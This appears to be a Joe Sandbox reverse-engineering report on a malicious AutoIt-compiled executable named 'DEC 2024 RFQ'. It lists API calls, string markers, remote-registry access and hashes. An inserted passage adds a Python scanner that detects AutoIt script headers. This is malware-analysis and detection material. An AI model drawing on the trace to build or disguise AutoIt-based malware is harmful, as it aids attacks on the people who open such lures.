• String ID:
• API String ID: 884005220-0
• Opcode ID: 2f673c3a139f04b026a0b1e70999924886ded98dacfa1ca99c25a3eb63e5e743
• Instruction ID: 2e831082799beddae3b16d01ab6a3ab05cd1895d421ef98a7d239786a17cfe00
• Opcode Fuzzy Hash: 2f673c3a139f04b026a0b1e70999924886ded98dacfa1ca99c25a3eb63e5e743
• Instruction Fuzzy Hash: 826116B2A04211AFEB205F24DC457AF77E4EF02722F254769EC01AB192DB38C949C793
APIs
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 000ABA56
• GetFileSize.KERNEL32(00000000,00000000), ref: 000ABA6D
• GlobalAlloc.KERNEL32(00000002,00000000), ref: 000ABA78
• CloseHandle.KERNEL32(00000000), ref: 000ABA85
• GlobalLock.KERNEL32(00000000), ref: 000ABA8E
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 000ABA9D
• GlobalUnlock.KERNEL32(00000000), ref: 000ABAA6
• CloseHandle.KERNEL32(00000000), ref: 000ABAAD
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 000ABABE
• OleLoadPicture.OLEAUT32(?,00000000,00000000,000B2CAC,?), ref: 000ABAD7
• GlobalFree.KERNEL32(00000000), ref: 000ABAE7
• GetObjectW.GDI32(?,00000018,000000FF), ref: 000ABB0B
• CopyImage.USER32(?,00000000,?,?,00002000), ref: 000ABB36
• DeleteObject.GDI32(00000000), ref: 000ABB5E
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 000ABB74
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
• String ID:
• API String ID: 3840717409-0
• Opcode ID: 3a40a8cc76b3f31c31182a20229bd6150f1210dc53e640620219c45cf5391876
• Instruction ID: 9c7675a175907db9df037bbfa25bfd21406499fb9cd9baa3bbf478988b829445
• Opcode Fuzzy Hash: 3a40a8cc76b3f31c31182a20229bd6150f1210dc53e640620219c45cf5391876
• Instruction Fuzzy Hash: 00412775600609EFEB219FA5DC88EBABBB8FB8A711F104168F905D7261D7749E01CB60
                                                                                                                      APIs
                                                                                                                      • __wsplitpath.LIBCMT ref: 0008DA10
                                                                                                                      • _wcscat.LIBCMT ref: 0008DA28
                                                                                                                      • _wcscat.LIBCMT ref: 0008DA3A
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0008DA4F
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0008DA63
                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 0008DA7B
                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 0008DA95
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0008DAA7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 34673085-438819550
                                                                                                                      • Opcode ID: dacd8680b819f34c6d587ebc038fd48cb5a6e8b6cd67e629b2645e813b12950a
                                                                                                                      • Instruction ID: 61d8b382bf401115c0dbd78fa4f2909caa9894bcc69ccdfa60d30a5a31a8f78c
                                                                                                                      • Opcode Fuzzy Hash: dacd8680b819f34c6d587ebc038fd48cb5a6e8b6cd67e629b2645e813b12950a
                                                                                                                      • Instruction Fuzzy Hash: 898160715042419FCB64FF64C844AAEB7E8BF89710F188A2FF8C9C7291EA30D945CB52
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00022612: GetWindowLongW.USER32(?,000000EB), ref: 00022623
                                                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 000AC1FC
                                                                                                                      • GetFocus.USER32 ref: 000AC20C
                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 000AC217
                                                                                                                      • _memset.LIBCMT ref: 000AC342
                                                                                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 000AC36D
                                                                                                                      • GetMenuItemCount.USER32(?), ref: 000AC38D
                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 000AC3A0
                                                                                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 000AC3D4
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 000AC41C
                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 000AC454
                                                                                                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 000AC489
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 1296962147-4108050209
                                                                                                                      • Opcode ID: fad3f8829d032e3e3eb924be9e1341480117e61a65ce8b1b4b674916c0fabfa2
                                                                                                                      • Instruction ID: 8e7e6328093641aa42b7ef482f922c8e1ca2305eebff8630d485050960f92750
                                                                                                                      • Opcode Fuzzy Hash: fad3f8829d032e3e3eb924be9e1341480117e61a65ce8b1b4b674916c0fabfa2
                                                                                                                      • Instruction Fuzzy Hash: E181A0716083019FEB60CFA4C894EBBBBE4FB8A714F01492DF99597291C770D905CB92
                                                                                                                      APIs
                                                                                                                      • GetDC.USER32(00000000), ref: 0009738F
                                                                                                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0009739B
                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 000973A7
                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 000973B4
                                                                                                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00097408
                                                                                                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00097444
                                                                                                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00097468
                                                                                                                      • SelectObject.GDI32(00000006,?), ref: 00097470
                                                                                                                      • DeleteObject.GDI32(?), ref: 00097479
                                                                                                                      • DeleteDC.GDI32(00000006), ref: 00097480
                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 0009748B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 2598888154-3887548279
                                                                                                                      • Opcode ID: 4e94c7d991dd63dc996b48fb19e76031b27a738ac0860c55f9827d47e19d8fe6
                                                                                                                      • Instruction ID: 9f3142f67c57c5c58cb10c3720121f1a727843ca69baf2f825588b6de4c28a70
                                                                                                                      • Opcode Fuzzy Hash: 4e94c7d991dd63dc996b48fb19e76031b27a738ac0860c55f9827d47e19d8fe6
                                                                                                                      • Instruction Fuzzy Hash: DD515A76904709EFDB24CFA8CC84EAEBBB9EF49310F14852DF999A7211C735A940DB50
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00040957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00026B0C,?,00008000), ref: 00040973
                                                                                                                        • Part of subcall function 00024750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00024743,?,?,000237AE,?), ref: 00024770
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00026BAD
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00026CFA
                                                                                                                        • Part of subcall function 0002586D: _wcscpy.LIBCMT ref: 000258A5
                                                                                                                        • Part of subcall function 0004363D: _iswctype.LIBCMT ref: 00043645
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                      • API String ID: 537147316-1018226102
                                                                                                                      • Opcode ID: c53599e855f857ee2a5fe8b9ad36e150adf97394c4545f8996af1ad5774c9548
                                                                                                                      • Instruction ID: 8273caec1535bc7694d7cf0e92f21c2b9cc63797bf9c632fccb53c1b983b17ac
                                                                                                                      • Opcode Fuzzy Hash: c53599e855f857ee2a5fe8b9ad36e150adf97394c4545f8996af1ad5774c9548
                                                                                                                      • Instruction Fuzzy Hash: 2B02CD705083519FC724EF20D881AAFBBE5EF99354F10482DF8C9972A2DB31DA49CB52
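The string references of the routine above (">>>AUTOIT SCRIPT<<<", "AU3!", "EA06") are the markers the AutoIt3 runtime stub uses to locate its compiled script, and they are what the "Binary is likely a compiled AutoIt script file" verdict rests on. The following scanner is an added example, not part of the Joe Sandbox report and not AutoIt's own code. It assumes the ASCII header tag "AU3!EA06" precedes the script data, searches the resource name in both ASCII and UTF-16LE (the routine above is built on wcscpy and wide-character APIs, so the name may be stored either way), and includes "AU3!EA05" as an assumed older header variant.

```python
from typing import Dict, List

# Markers taken from the string references listed in this report; the EA05
# variant is an assumption (older AutoIt3 header), not something seen here.
MARKERS: Dict[str, List[bytes]] = {
    "au3_header": [b"AU3!EA06", b"AU3!EA05"],
    "script_resource_name": [
        ">>>AUTOIT SCRIPT<<<".encode("ascii"),
        ">>>AUTOIT SCRIPT<<<".encode("utf-16-le"),
    ],
}


def find_all(data: bytes, needle: bytes) -> List[int]:
    """Every offset at which needle occurs in data (non-overlapping search)."""
    hits: List[int] = []
    start = 0
    while True:
        pos = data.find(needle, start)
        if pos == -1:
            return hits
        hits.append(pos)
        start = pos + len(needle)


def scan_for_autoit(data: bytes) -> Dict[str, List[int]]:
    """Map each marker label to the sorted offsets where any of its encodings occurs."""
    found: Dict[str, List[int]] = {}
    for label, needles in MARKERS.items():
        offsets = sorted(off for n in needles for off in find_all(data, n))
        if offsets:
            found[label] = offsets
    return found


def is_probably_compiled_autoit(data: bytes) -> bool:
    # The resource name also occurs as a literal inside the interpreter stub
    # (it is a string reference of the routine above), so the header tag that
    # sits in front of actual script data is the stronger signal.
    return "au3_header" in scan_for_autoit(data)


# Constructed test image (not a real sample): a minimal MZ/PE-looking prefix,
# filler, the wide resource name, padding, then the header tag and fake script bytes.
SAMPLE = (
    b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x90" * 100
    + ">>>AUTOIT SCRIPT<<<".encode("utf-16-le") + b"\x00" * 16
    + b"AU3!EA06" + b"\xde\xad\xbe\xef" * 8
)

if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    print(scan_for_autoit(blob), is_probably_compiled_autoit(blob))
```

Run it against a file path to check a suspect executable offline; the header offset it reports is where the compiled script resource begins, which is the input a script extractor would start from.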
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00082D50
                                                                                                                      • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00082DDD
                                                                                                                      • GetMenuItemCount.USER32(000E5890), ref: 00082E66
                                                                                                                      • DeleteMenu.USER32(000E5890,00000005,00000000,000000F5,?,?), ref: 00082EF6
                                                                                                                      • DeleteMenu.USER32(000E5890,00000004,00000000), ref: 00082EFE
                                                                                                                      • DeleteMenu.USER32(000E5890,00000006,00000000), ref: 00082F06
                                                                                                                      • DeleteMenu.USER32(000E5890,00000003,00000000), ref: 00082F0E
                                                                                                                      • GetMenuItemCount.USER32(000E5890), ref: 00082F16
                                                                                                                      • SetMenuItemInfoW.USER32(000E5890,00000004,00000000,00000030), ref: 00082F4C
                                                                                                                      • GetCursorPos.USER32(?), ref: 00082F56
                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 00082F5F
                                                                                                                      • TrackPopupMenuEx.USER32(000E5890,00000000,?,00000000,00000000,00000000), ref: 00082F72
                                                                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00082F7E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3993528054-0
                                                                                                                      • Opcode ID: faf18dcf991781b5aec77cb58981ae6b495f6460297409639b297dc9efaf574c
                                                                                                                      • Instruction ID: bd40936856ec3c4a590a496468f7e4f6fee813956ccf82de5f39068a44607a63
                                                                                                                      • Opcode Fuzzy Hash: faf18dcf991781b5aec77cb58981ae6b495f6460297409639b297dc9efaf574c
                                                                                                                      • Instruction Fuzzy Hash: 2A71F670600606BFFB21AF64DC85FAABFA8FF05724F100226F655AA1E1C7B55C20DB94
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00027BCC: _memmove.LIBCMT ref: 00027C06
                                                                                                                      • _memset.LIBCMT ref: 0007786B
                                                                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 000778A0
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 000778BC
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 000778D8
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00077902
                                                                                                                      • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0007792A
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00077935
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0007793A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                      • API String ID: 1411258926-22481851
                                                                                                                      • Opcode ID: 4d723e5c5efad53cb54329a74a54a7de3e0a996299a00370d9e5e73cec24ddf3
                                                                                                                      • Instruction ID: 2ad01e154d82f2e3bb9d6a5b9e09f372a49542edd3e1242be1d5ffced94f2dbf
                                                                                                                      • Opcode Fuzzy Hash: 4d723e5c5efad53cb54329a74a54a7de3e0a996299a00370d9e5e73cec24ddf3
                                                                                                                      • Instruction Fuzzy Hash: D5410872C1462DABDF11EFA4EC85DEDB7B8BF04350F40452AE909A7262EB345D04CB94
APIs
• CharUpperBuffW.USER32(?,?,?,?,?,?,?,0009FDAD,?,?), ref: 000A0E31
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: BuffCharUpper
• String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
• API String ID: 3964851224-909552448
• Opcode ID: 6bd07c8270c537ee71cf512ff3d84ae37bdf75af220f5f4ae7abec8467993d56
• Instruction ID: d3e35fe3efb64ca7857e7ae93900ecb7bb5069ce233bfd535aa586cdfdfa7d6c
• Opcode Fuzzy Hash: 6bd07c8270c537ee71cf512ff3d84ae37bdf75af220f5f4ae7abec8467993d56
• Instruction Fuzzy Hash: 2541587114034A8FCF20EF90E865AEE37A4AF12344F144465FC592B693DB35AD6ACBA1
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0005E2A0,00000010,?,Bad directive syntax error,000AF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0007F7C2
• LoadStringW.USER32(00000000,?,0005E2A0,00000010), ref: 0007F7C9
  • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
• _wprintf.LIBCMT ref: 0007F7FC
• __swprintf.LIBCMT ref: 0007F81E
• MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0007F88D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 1506413516-4153970271
• Opcode ID: 752119fa80971e3498c1eeb6767d132db739d29783247ddaa88ec3b219c6fe16
• Instruction ID: 6e60a1b9a8610903e2f0a94147092c85ad9f643827ce95bfdc3a2fa34f5c2d16
• Opcode Fuzzy Hash: 752119fa80971e3498c1eeb6767d132db739d29783247ddaa88ec3b219c6fe16
• Instruction Fuzzy Hash: 1121A03284021EEBCF11EFA0DC0AEFE7738BF18300F04446AF509661A2EA71A618CB55
APIs
  • Part of subcall function 00027BCC: _memmove.LIBCMT ref: 00027C06
  • Part of subcall function 00027924: _memmove.LIBCMT ref: 000279AD
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00085330
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00085346
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00085357
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00085369
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0008537A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: SendString$_memmove
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 2279737902-1007645807
• Opcode ID: a2de81398a734370238c2b0fdaba9eed3e9fae2af5317d0a1b11b1e0e6705524
• Instruction ID: 5decb4dd0b2111c8cb421d94c8129546027aced379e8f89c7f53321551cf14e4
• Opcode Fuzzy Hash: a2de81398a734370238c2b0fdaba9eed3e9fae2af5317d0a1b11b1e0e6705524
• Instruction Fuzzy Hash: 7911B270A5422979D760B671DC4ADFF7BBCFB96B41F00042AB905A61D2EEA04D44C7B0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 208665112-3771769585
• Opcode ID: 071aa0c54e1841b910e2fdf65b6f04a005c5ead8f98289e84954418223c208b9
• Instruction ID: de082ea80f6adccd2492279b864e6346f786044b461cae2e9dff71f4f7a75280
• Opcode Fuzzy Hash: 071aa0c54e1841b910e2fdf65b6f04a005c5ead8f98289e84954418223c208b9
• Instruction Fuzzy Hash: FB11E7719041166FDB60BB709C4AEEE7BBCEF02711F0401B6F58596092EF749A818754
APIs
• timeGetTime.WINMM ref: 00084F7A
  • Part of subcall function 0004049F: timeGetTime.WINMM(?,75C0B400,00030E7B), ref: 000404A3
• Sleep.KERNEL32(0000000A), ref: 00084FA6
• EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00084FCA
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00084FEC
• SetActiveWindow.USER32 ref: 0008500B
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00085019
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00085038
• Sleep.KERNEL32(000000FA), ref: 00085043
• IsWindow.USER32 ref: 0008504F
• EndDialog.USER32(00000000), ref: 00085060
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
• Opcode ID: 6a37aa62e64db6a83d220dfb0171af7cf6f797284994db16c5aa43f9c0d50a55
• Instruction ID: 4cc1f306cd9dafce4b2093a285a1d4c3107e58dc42de93d98a485d411710c213
• Opcode Fuzzy Hash: 6a37aa62e64db6a83d220dfb0171af7cf6f797284994db16c5aa43f9c0d50a55
• Instruction Fuzzy Hash: 94218071605E46AFF7106F70ECC8B363BA9FB56B86F041038F246951B2DB6A4D108B61
APIs
  • Part of subcall function 00029837: __itow.LIBCMT ref: 00029862
  • Part of subcall function 00029837: __swprintf.LIBCMT ref: 000298AC
• CoInitialize.OLE32(00000000), ref: 0008D5EA
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0008D67D
• SHGetDesktopFolder.SHELL32(?), ref: 0008D691
• CoCreateInstance.OLE32(000B2D7C,00000000,00000001,000D8C1C,?), ref: 0008D6DD
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0008D74C
• CoTaskMemFree.OLE32(?,?), ref: 0008D7A4
• _memset.LIBCMT ref: 0008D7E1
• SHBrowseForFolderW.SHELL32(?), ref: 0008D81D
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0008D840
